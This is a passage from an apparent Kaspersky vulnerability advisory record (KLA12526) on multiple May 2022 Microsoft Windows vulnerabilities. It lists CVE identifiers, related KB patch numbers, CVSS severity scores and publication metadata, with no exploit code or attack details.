\n[CVE-2022-29135](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2022-29135>) \n[CVE-2022-24466](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2022-24466>) \n[CVE-2022-26940](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2022-26940>) \n[CVE-2022-29134](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2022-29134>) \n[CVE-2022-26913](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2022-26913>) \n[CVE-2022-26938](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2022-26938>) \n[CVE-2022-26926](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2022-26926>) \n[CVE-2022-22016](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2022-22016>) \n[CVE-2022-23270](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2022-23270>) \n[CVE-2022-29142](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2022-29142>) \n[CVE-2022-29121](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2022-29121>) \n[CVE-2022-21972](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2022-21972>) \n[CVE-2022-26923](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2022-26923>) \n[CVE-2022-26930](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2022-26930>) \n[CVE-2022-29123](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2022-29123>) \n[CVE-2022-29120](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2022-29120>) \n[CVE-2022-26935](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2022-26935>) \n[CVE-2022-29126](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2022-29126>) \n[CVE-2022-29114](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2022-29114>) \n[CVE-2022-29116](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2022-29116>) \n[CVE-2022-26934](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2022-26934>) 
\n[CVE-2022-26932](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2022-26932>) \n[CVE-2022-26939](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2022-26939>) \n\n\n### *Impacts*:\nACE \n\n### *Related products*:\n[Microsoft Windows](<https://threats.kaspersky.com/en/product/Microsoft-Windows/>)\n\n### *KB list*:\n[5014018](<http://support.microsoft.com/kb/5014018>) \n[5014001](<http://support.microsoft.com/kb/5014001>) \n[5013942](<http://support.microsoft.com/kb/5013942>) \n[5013941](<http://support.microsoft.com/kb/5013941>) \n[5014025](<http://support.microsoft.com/kb/5014025>) \n[5013952](<http://support.microsoft.com/kb/5013952>) \n[5013943](<http://support.microsoft.com/kb/5013943>) \n[5013944](<http://support.microsoft.com/kb/5013944>) \n[5014011](<http://support.microsoft.com/kb/5014011>) \n[5013945](<http://support.microsoft.com/kb/5013945>) \n[5014017](<http://support.microsoft.com/kb/5014017>) \n[5013963](<http://support.microsoft.com/kb/5013963>)\n\n### *Microsoft official advisories*:", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2022-05-10T00:00:00", "type": "kaspersky", "title": "KLA12526 Multiple vulnerabilities in Microsoft Windows", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", 
"accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2022-21972", "CVE-2022-22011", "CVE-2022-22012", "CVE-2022-22013", "CVE-2022-22014", "CVE-2022-22015", "CVE-2022-22016", "CVE-2022-22017", "CVE-2022-22019", "CVE-2022-22713", "CVE-2022-23270", "CVE-2022-23279", "CVE-2022-24466", "CVE-2022-26913", "CVE-2022-26923", "CVE-2022-26925", "CVE-2022-26926", "CVE-2022-26927", "CVE-2022-26930", "CVE-2022-26931", "CVE-2022-26932", "CVE-2022-26933", "CVE-2022-26934", "CVE-2022-26935", "CVE-2022-26936", "CVE-2022-26937", "CVE-2022-26938", "CVE-2022-26939", "CVE-2022-26940", "CVE-2022-29102", "CVE-2022-29103", "CVE-2022-29104", "CVE-2022-29105", "CVE-2022-29106", "CVE-2022-29112", "CVE-2022-29113", "CVE-2022-29114", "CVE-2022-29115", "CVE-2022-29116", "CVE-2022-29120", "CVE-2022-29121", "CVE-2022-29122", "CVE-2022-29123", "CVE-2022-29125", "CVE-2022-29126", "CVE-2022-29127", "CVE-2022-29128", "CVE-2022-29129", "CVE-2022-29130", "CVE-2022-29131", "CVE-2022-29132", "CVE-2022-29133", "CVE-2022-29134", "CVE-2022-29135", "CVE-2022-29137", "CVE-2022-29138", "CVE-2022-29139", "CVE-2022-29140", "CVE-2022-29141", "CVE-2022-29142", "CVE-2022-29150", "CVE-2022-29151"], "modified": "2022-10-18T00:00:00", "id": "KLA12526", "href": "https://threats.kaspersky.com/en/vulnerability/KLA12526/", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}]}